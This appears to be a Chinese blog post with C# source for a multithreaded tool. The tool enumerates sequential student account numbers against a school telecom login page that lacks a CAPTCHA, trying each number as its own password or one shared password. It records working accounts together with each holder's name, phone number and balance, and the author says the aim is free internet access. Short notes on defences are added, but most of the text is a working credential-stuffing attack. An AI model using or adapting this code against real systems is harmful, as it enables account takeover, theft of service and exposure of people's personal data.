c#实现对登陆信息的反馈,实现对网站登录密码的扫描
最近发现我们学校的电信上网改密码的页面很简单,没有验证码,于是我就很好奇。后来发现原来是我们学校电信的那个改密码的页面有漏洞,于是就可以通过扫描账号免费上网。
原理就是对修改密码的页面进行POST请求
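如果账号和密码正确,服务器就返回200(下面的扫描代码实际上是根据响应正文里是否出现“客户名称”来判断登录成功的)。从防护角度看,问题在于这个页面没有验证码,并且对正确和错误的凭据返回可区分的结果;加上验证码、按来源和按账号的失败次数限制,并且不允许密码与账号相同(下面的代码在未指定密码时就是拿账号本身当密码去尝试),就能阻止这类枚举。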
下面是C#的网络操作类
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;
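using System.Text.RegularExpressions;

namespace scan
{
    /// <summary>
    /// Small synchronous HTTP helper built on <see cref="WebRequest"/>: form POSTs, GETs with an
    /// optional cookie container, and a regex-based HTML tag stripper.
    /// </summary>
    /// <remarks>
    /// None of the request methods sets Timeout or ReadWriteTimeout (the assignments are commented
    /// out in the original listing), so the framework defaults apply. Form data is sent as given:
    /// if the URL is plain http:// any credentials in the body travel unencrypted.
    /// </remarks>
    public class zzHttp
    {
        private const string sContentType = "application/x-www-form-urlencoded";

        // Currently not sent: the assignment to request.UserAgent in Send is commented out.
        private const string sUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";

        // Patterns applied by ClearHtml, in this exact order. Repeated entries are kept on
        // purpose: removing one tag can join the text around it into a new match for a
        // pattern that already ran, so a second pass is not a no-op.
        // NOTE(review): the two " " entries are a single space as shown on the page; the
        // original was probably "&nbsp;" decoded by the page rendering - confirm against the source.
        private static readonly string[] sHtmlPatterns = new string[]
        {
            "&#[^>]*;",
            "</?marquee[^>]*>",
            "</?object[^>]*>",
            "</?param[^>]*>",
            "</?embed[^>]*>",
            "</?table[^>]*>",
            " ",
            "</?tr[^>]*>",
            "</?th[^>]*>",
            "</?p[^>]*>",
            "</?a[^>]*>",
            "</?img[^>]*>",
            "</?tbody[^>]*>",
            "</?li[^>]*>",
            "</?span[^>]*>",
            "</?div[^>]*>",
            "</?th[^>]*>",
            "</?td[^>]*>",
            "</?script[^>]*>",
            "(javascript|jscript|vbscript|vbs):",
            "on(mouse|exit|error|click|key)",
            "<\\?xml[^>]*>",
            "<\\/?[a-z]+:[^>]*>",
            "</?font[^>]*>",
            "</?b[^>]*>",
            "</?u[^>]*>",
            "</?i[^>]*>",
            "</?strong[^>]*>",
            "</?strong[^>]*>",
            " "
        };

        /// <summary>
        /// POSTs <paramref name="data"/> (encoded as UTF-8) to <paramref name="url"/> and returns
        /// the response body decoded as UTF-8.
        /// </summary>
        /// <param name="data">Form body, already in application/x-www-form-urlencoded form.</param>
        /// <param name="url">Target http/https URL.</param>
        /// <returns>The response body.</returns>
        /// <exception cref="ApplicationException">The URL does not produce an HTTP request.</exception>
        public static string Send(string data, string url)
        {
            return Send(Encoding.UTF8.GetBytes(data), url);
        }

        /// <summary>
        /// POSTs raw bytes to <paramref name="url"/> as application/x-www-form-urlencoded and
        /// returns the response body decoded as UTF-8.
        /// </summary>
        /// <param name="data">Request body bytes.</param>
        /// <param name="url">Target http/https URL.</param>
        /// <returns>The response body.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="data"/> is null.</exception>
        /// <exception cref="ApplicationException">The URL does not produce an HTTP request.</exception>
        public static string Send(byte[] data, string url)
        {
            if (data == null)
            {
                throw new ArgumentNullException("data");
            }

            HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
            if (request == null)
            {
                throw new ApplicationException(string.Format("Invalid url string: {0}", url));
            }

            // request.UserAgent = sUserAgent;
            request.ContentType = sContentType;
            request.Method = "POST";
            request.ContentLength = data.Length;
            WriteBody(request, data);

            // Exceptions from GetResponse propagate unchanged, so the caller sees the
            // original stack trace.
            return ReadBody(request, Encoding.UTF8);
        }

        #region Synchronous POST

        /// <summary>
        /// Sends a form POST encoded as gb2312 and returns the response body decoded as gb2312.
        /// </summary>
        /// <param name="Url">Target URL.</param>
        /// <param name="postDataStr">Form body, already in application/x-www-form-urlencoded form.</param>
        /// <param name="cookie">
        /// Cookie container for the request. A null or empty container is replaced by a new one,
        /// which is handed back to the caller through the ref parameter.
        /// </param>
        /// <returns>The response body.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="postDataStr"/> is null.</exception>
        public string SendDataByPost(string Url, string postDataStr, ref CookieContainer cookie)
        {
            if (postDataStr == null)
            {
                throw new ArgumentNullException("postDataStr");
            }

            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url);
            request.CookieContainer = EnsureCookieContainer(ref cookie);
            request.Method = "POST";
            request.ContentType = "application/x-www-form-urlencoded";

            // Content-Length must be the number of encoded bytes. The character count is
            // smaller than the byte count as soon as the data contains non-ASCII text,
            // which makes the write to the request stream fail.
            Encoding gb2312 = Encoding.GetEncoding("gb2312");
            byte[] body = gb2312.GetBytes(postDataStr);
            request.ContentLength = body.Length;
            //request.Timeout = 1000;
            //request.ReadWriteTimeout = 3000;
            WriteBody(request, body);

            return ReadBody(request, gb2312);
        }

        #endregion

        #region Synchronous GET

        /// <summary>
        /// Sends a GET request and returns the response body decoded as UTF-8.
        /// </summary>
        /// <param name="Url">Target URL without a query string.</param>
        /// <param name="postDataStr">
        /// Query string without the leading '?'. It is appended verbatim, so the caller must
        /// percent-encode it.
        /// </param>
        /// <param name="cookie">
        /// Cookie container for the request. A null or empty container is replaced by a new one,
        /// which is handed back to the caller through the ref parameter.
        /// </param>
        /// <returns>The response body.</returns>
        public string SendDataByGET(string Url, string postDataStr, ref CookieContainer cookie)
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(AppendQuery(Url, postDataStr));
            request.CookieContainer = EnsureCookieContainer(ref cookie);
            request.Method = "GET";
            request.ContentType = "text/html;charset=UTF-8";

            return ReadBody(request, Encoding.UTF8);
        }

        #endregion

        /// <summary>
        /// Best-effort GET: returns the response body decoded with the named encoding, or an
        /// empty string if anything fails.
        /// </summary>
        /// <param name="Url">Target URL without a query string.</param>
        /// <param name="getdata">Query string without the leading '?', appended verbatim.</param>
        /// <param name="type">Name of the encoding used to decode the response, e.g. "utf-8".</param>
        /// <returns>The response body, or "" on any failure.</returns>
        public string zzget(string Url, string getdata, string type)
        {
            try
            {
                Encoding encoding = Encoding.GetEncoding(type);
                System.Net.WebRequest wReq = System.Net.WebRequest.Create(AppendQuery(Url, getdata));
                wReq.Method = "GET";
                wReq.ContentType = "text/html;charset=UTF-8";
                return ReadBody(wReq, encoding);
            }
            catch (System.Exception ex)
            {
                // The empty-string result is the documented failure value; record the cause
                // instead of dropping it. Only the exception type and message are traced,
                // not the URL or query, which may carry sensitive parameters.
                System.Diagnostics.Trace.TraceWarning("zzget failed: {0}: {1}", ex.GetType().Name, ex.Message);
            }
            return "";
        }

        /// <summary>
        /// Sends the dictionary as a form POST and returns the response body.
        /// </summary>
        /// <param name="URL">Target URL.</param>
        /// <param name="strPostdata">
        /// Form fields. Keys and values are written verbatim as key=value pairs joined by '&amp;';
        /// they are NOT percent-encoded here, so a raw '&amp;' or '=' inside a value changes the
        /// structure of the form. Callers must encode untrusted values first. A null value is
        /// sent as an empty string.
        /// </param>
        /// <param name="strEncoding">Name of the encoding used to decode the response.</param>
        /// <returns>The response body.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="strPostdata"/> is null.</exception>
        public string zzpost(string URL, IDictionary<string, Object> strPostdata, string strEncoding)
        {
            if (strPostdata == null)
            {
                throw new ArgumentNullException("strPostdata");
            }

            // Resolve the response encoding first so that a bad name fails before anything is sent.
            Encoding responseEncoding = System.Text.Encoding.GetEncoding(strEncoding);

            // NOTE(review): the body is encoded with the platform default encoding while the
            // response is decoded with strEncoding; kept as in the original - confirm intent.
            byte[] buffer = Encoding.Default.GetBytes(BuildFormBody(strPostdata));

            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);
            request.CookieContainer = new CookieContainer(); // original note: login does not work without this
            request.Method = "POST";
            request.Accept = "text/html, application/xhtml+xml, */*";
            request.ContentType = "application/x-www-form-urlencoded";
            request.ContentLength = buffer.Length;
            WriteBody(request, buffer);

            return ReadBody(request, responseEncoding);
        }

        /// <summary>
        /// Strips a fixed list of HTML tags, numeric character references, script-scheme
        /// prefixes and all whitespace from <paramref name="Content"/>.
        /// </summary>
        /// <remarks>
        /// This is a text-extraction helper, not a sanitizer. Removing fragments with a list of
        /// patterns can leave or even create markup, and several patterns are prefix matches
        /// (for example the "p" pattern also removes "param" and "pre" tags). Do not use the
        /// result as safe HTML; encode on output instead.
        /// </remarks>
        /// <param name="Content">HTML text; null is treated as empty.</param>
        /// <returns>The text with the listed markup and every whitespace character removed.</returns>
        public static string ClearHtml(string Content)
        {
            foreach (string pattern in sHtmlPatterns)
            {
                Content = Zxj_ReplaceHtml(pattern, "", Content);
            }

            // Every whitespace character is removed, so no separate trim is needed.
            return Regex.Replace(Content, @"\s+", "");
        }

        /// <summary>
        /// Replaces every case-insensitive match of a pattern in the given text.
        /// </summary>
        /// <param name="patrn">Regular expression to replace.</param>
        /// <param name="strRep">Replacement text.</param>
        /// <param name="content">Input text; null is treated as empty.</param>
        /// <returns>The text after replacement.</returns>
        private static string Zxj_ReplaceHtml(string patrn, string strRep, string content)
        {
            return Regex.Replace(content ?? "", patrn, strRep, RegexOptions.IgnoreCase);
        }

        // Returns the caller's cookie container, or a fresh one (also stored back into the
        // ref argument) when the caller passed null or an empty container.
        private static CookieContainer EnsureCookieContainer(ref CookieContainer cookie)
        {
            if (cookie == null || cookie.Count == 0)
            {
                cookie = new CookieContainer();
            }
            return cookie;
        }

        // Appends a query string to a URL, adding '?' only when there is something to append.
        private static string AppendQuery(string url, string query)
        {
            return string.IsNullOrEmpty(query) ? url : url + "?" + query;
        }

        // Joins the fields as key=value pairs separated by '&'; an empty dictionary gives "".
        private static string BuildFormBody(IDictionary<string, Object> fields)
        {
            StringBuilder data = new StringBuilder();
            foreach (KeyValuePair<string, Object> param in fields)
            {
                if (data.Length > 0)
                {
                    data.Append("&");
                }
                data.Append(param.Key).Append("=");
                if (param.Value != null)
                {
                    data.Append(param.Value.ToString());
                }
            }
            return data.ToString();
        }

        // Writes the request body and closes the request stream.
        private static void WriteBody(WebRequest request, byte[] body)
        {
            using (Stream requestStream = request.GetRequestStream())
            {
                requestStream.Write(body, 0, body.Length);
            }
        }

        // Reads the whole response body and disposes the response, its stream and the reader
        // even when reading fails.
        private static string ReadBody(WebRequest request, Encoding encoding)
        {
            using (WebResponse response = request.GetResponse())
            using (Stream responseStream = response.GetResponseStream())
            using (StreamReader reader = new StreamReader(responseStream, encoding))
            {
                return reader.ReadToEnd();
            }
        }
    }
}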
然后对某个网址进行post请求
// Start the scan.
// NOTE(review): this method is shown on its own; GetValue, CountProcess, CheckThreadPool,
// AddAccountMessage, rhw, beginclass and endclass are defined outside this listing
// (presumably on the Form1 that scanuser references - confirm).
//
// What the visible code does: it builds candidate account numbers as
//   <grade m><fixed segment no><class index j><student index i>
// with j in 1..cnum and i in 1..snum (each zero-padded to two digits below 10), and queues one
// scanuser.login work item per candidate on the ThreadPool. If no password was supplied,
// every candidate is tried with the account number itself as the password; otherwise the
// same supplied password is tried against every account.
//
// Seen from the server this is a burst of POSTs to one URL, with sequential account names and
// either password == account name or one shared password. Per-source and per-account attempt
// limits, lockout and a CAPTCHA on the form are the controls that stop it, together with
// rejecting passwords equal to the account number.
public void scan()
{
// true = no password supplied, so the account number is used as the password
bool flag = false;
// V[0]: fixed segment of the account number, V[1]: password to try (may be empty),
// V[2]: number of classes, V[3]: number of students per class - as used below.
object[] V= GetValue();
string no = V[0].ToString();
string userpass = V[1].ToString();
int cnum = int.Parse(V[2].ToString());
// the if on the same line sets flag when the supplied password is empty
int snum = int.Parse(V[3].ToString()); if (userpass.Length <= 0)
flag = true;
// one zzHttp instance is shared by all queued work items
zzHttp http = new zzHttp();
// the literal is a placeholder meaning "put the URL you need here"
string url = "这儿填你需要的网址";
//count the threads
ThreadPool.QueueUserWorkItem(new WaitCallback(CountProcess)); //check whether the threads have finished (describes the next statement)
rhw = ThreadPool.RegisterWaitForSingleObject(new AutoResetEvent(false), this.CheckThreadPool, null, 1000, false);
// int.Parse throws on non-numeric input; no validation is visible here
int begin = int.Parse(beginclass.Text);
int end = int.Parse(endclass.Text);
for (int m = begin; m <= end; m++)//scan each grade
{ for (int j = 1; j <= cnum; j++)
{
// prefix shared by every student in class j of grade m
string tmp = "";
if (j < 10)
tmp = m + no + "0" + j;
else
tmp = m + no + j;
for (int i = 1; i <= snum; i++)
{
string tempstuno = "";//the constructed student number
if (i < 10)
tempstuno = tmp + "0" + i;
else
tempstuno = tmp + i;
// the literal suffix means "<checking...>"
AddAccountMessage( tempstuno + "<正在检查...>");
if (flag)
{
// no password supplied: the account number is also passed as the password
scanuser s = new scanuser(http, url, tempstuno, tempstuno, this);
// threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
else
{
// the same supplied password is tried for every account
scanuser s = new scanuser(http, url, tempstuno, userpass, this);
//threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
//threadReceive.Start();
}
}
}
}
下面是扫描类
//Scan class: holds one account/password pair and checks it against the target URL.
class scanuser
{
// form used for status output; Setcolor and AddScanMessage are defined outside this listing
public Form1 F = null;
zzHttp http;
string url;
string username;
string userpass;
//Stores the pair to be checked; the check itself happens in login.
public scanuser(zzHttp http, string url, string username, string userpass, Form1 F)
{
this.F = F;
this.http = http;
this.username = username;
this.userpass = userpass;
this.url = url;
}
//Log in. The signature matches WaitCallback; stateInfo is not used.
// The pair is sent as name=...&password=... without percent-encoding, and success is decided
// by the response body containing the label "客户名称" (customer name). The fields are then
// cut out of the tag-stripped text at fixed offsets, so any change in page layout makes
// Substring throw; the catch-all below reports that as "网络故障..." (network failure).
// A successful response carries the customer name, phone number and prepaid balance, so
// each compromised account also discloses that personal data.
// NOTE(review): F.Setcolor/F.AddScanMessage are called from whatever thread runs login;
// whether they marshal to the UI thread is not visible here - confirm.
public void login(Object stateInfo)
{
string postdata = String.Format("name={0}&password={1}", username, userpass);
// a fresh, empty cookie container for every attempt
CookieContainer cookie = new CookieContainer();
try
{
string ret = http.SendDataByPost(url, postdata, ref cookie); if (ret.Contains("客户名称"))
{
ret = zzHttp.ClearHtml(ret);//strip the surplus html (this also removes all whitespace)
//get the name
int pos = ret.LastIndexOf("客户名称");
// +5 skips the 4-character label plus one more character (presumably a separator - confirm)
string name = ret.Substring(pos + 5, 2);//two-character name
string tmp = ret.Substring(pos + 7, 1);//third character
// "联" is the first character of the "联系电话" (contact phone) label, i.e. the name had only two characters
if (tmp != "联")
name = name + tmp;
//get the mobile number
pos = ret.LastIndexOf("联系电话");
string tel = ret.Substring(pos + 5, 11);
// accept only an 11-digit number starting with 1; otherwise record "无" (none)
Regex regex = new Regex("^1\\d{10}$");
if (!regex.IsMatch(tel))
tel = "无";
//get the prepaid balance
pos = ret.LastIndexOf("预存款余额(RMB)");
// +11 skips the 10-character label plus one more character; 5 characters are taken,
// and a 6th is appended unless it is "<"
string money = ret.Substring(pos + 11,5);
tmp = ret.Substring(pos+16,1);
if (tmp != "<")
// NOTE(review): on the page the declaration of width is part of the trailing comment on the
// next line, so width is undeclared in the code as shown; it looks like a line break was
// lost in extraction - confirm against the original source.
money += tmp; //get the bandwidth; first check whether there is a remark -- page text continues: string width = "2M";
// "独享" means dedicated (bandwidth)
if (ret.Contains("独享"))
{
if (ret.Contains("4M"))
width = "4M";
else if (ret.Contains("6M"))
width = "6M";
else if (ret.Contains("8M"))
width = "8M";
else if (ret.Contains("12M"))
width = "12M"; }
// "有效" means the account is active
if (ret.Contains("有效"))
{ //F.AddScanMessage("\n");
F.Setcolor(Color.Green);
F.AddScanMessage(username + "<有效," + name + "," + tel + ",$=" + money + "," + width + ">");
// write_txt is defined outside this listing; it receives the account number and the
// password in clear text
write_txt(username,userpass,name,width);
}
// "停机" means the account is suspended
else if (ret.Contains("停机"))
{
//F.AddScanMessage("\n");
F.Setcolor(Color.Red);
F.AddScanMessage(username + "<停机,"+ name + "," + tel + ">");
}
}
}catch(Exception ex)
{
// every exception, including parsing errors from the Substring calls above, is reported
// with the "网络故障..." (network failure) prefix
F.Setcolor(Color.Yellow);
F.AddScanMessage("网络故障..."+ex.Message);
}
}
}